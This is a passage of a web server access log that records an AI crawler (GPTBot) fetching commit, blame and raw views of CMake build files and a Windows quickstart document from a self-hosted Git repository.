+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:18:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fQUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 25664] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15215] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15214] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35734] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35739] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35737] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46759] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35740] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35737] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46761] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46761] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46760] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46758] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35738] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35742] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] 